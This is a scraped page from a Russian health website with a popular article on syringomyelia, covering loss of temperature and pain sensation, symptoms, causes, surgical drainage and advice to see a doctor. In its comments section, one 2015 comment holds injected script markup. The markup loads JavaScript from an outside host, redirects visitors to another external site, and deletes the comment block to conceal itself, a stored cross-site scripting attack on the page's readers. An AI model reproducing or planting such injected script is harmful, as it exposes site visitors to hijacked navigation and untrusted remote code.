Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сирингомиелия: тепло или ...  >>  Сирингомиелия: тепло или холодно?
 
Обратная связь
 

Сирингомиелия: тепло или холодно?

Размер шрифта
16 марта 2012 10:00
  • google_analytics: false
  • Нравится

Чувствуют ли ваши руки перепады температур? Если нет, проверьтесь у врача: возможно, у вас есть серьезное заболевание спинного мозга – сирингомиелия. Что делать, если вы не отличаете тепло от холода и как это лечить?

1

Суть болезни

В спинном мозге образуются кисты, в которых накапливается спинномозговая жидкость. Кисты сдавливают спинной мозг и нервные окончания, отвечающие за проведение температурных и болевых импульсов. Эти импульсы перестают поступать в головной мозг. Человек теряет температурную и болевую чувствительность, но при этом у него сохраняется чувствительность тактильная (от прикосновений).

Человека с сирингомиелией можно заживо сжечь, но импульс не передастся, и он не почувствует боли.

Сирингомиелия обычно проявляется в возрастном переходном периоде (30-40 лет), когда человек из молодого возраста вступает в средний. Эта болезнь прогрессирует очень медленно, тем она и опасна.

Макет кисты спинного мозга в разрезе
На фото: макет кисты спинного мозга в разрезе

Симптомы

Сирингомиелия имеет бытовое проявление. Самый яркий ее симптом – люди не чувствуют горячего, поэтому велика опасность ожогов. Клинически это проявляется тем, что пациенты обращаются к врачу с ожогами, но при этом не чувствуют боли.

При прогрессировании сирингомиелии могут проявиться и другие, более поздние ее симптомы. Например, нарушение моторной функции в виде параличей (онемений), когда страдают не только нервные волокна, отвечающие за передачу чувствительности, но и двигательные волокна. Это, в первую очередь, проявляется слабостью в кистях рук, которая со временем может появиться и в ногах.

Причины

  • Аномалия строения спинного мозга, предрасполагающая к врожденному образованию кист.
  • Перенесенное инфекционное вирусное заболевание (простуда).
  • Травма спинного мозга.

Лечение

Лечение сирингомиелии – хирургическое, основанное на обеспечении оттока спинно-мозговой жидкости из кисты, которая сдавливает нервные окончания. Этого можно достичь путем вскрытия и дренирования кисты при помощи шунтов и обеспечения оттока, например в брюшную полость. Киста уменьшается в объеме, потому что из нее вытекает жидкость, и чувствительность восстанавливается.

Как дополнительное лечение, особенно при онемениях, назначается физиотерапия.

Что делать

Если вы вдруг поняли, что не чувствуете горячего или боли, если замечаете ожог лишь некоторое время спустя, но не чувствуете боли и не можете вспомнить, когда вы его получили – это серьезный повод обратиться к врачу.

До той поры, пока вы не прошли обследования, старайтесь не прикасаться к тем предметам, которые могут быть горячими, т.е. потенциально опасными для вас.
 


Сюжеты по теме:
Сирингомиелия: тепло или холодно?

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.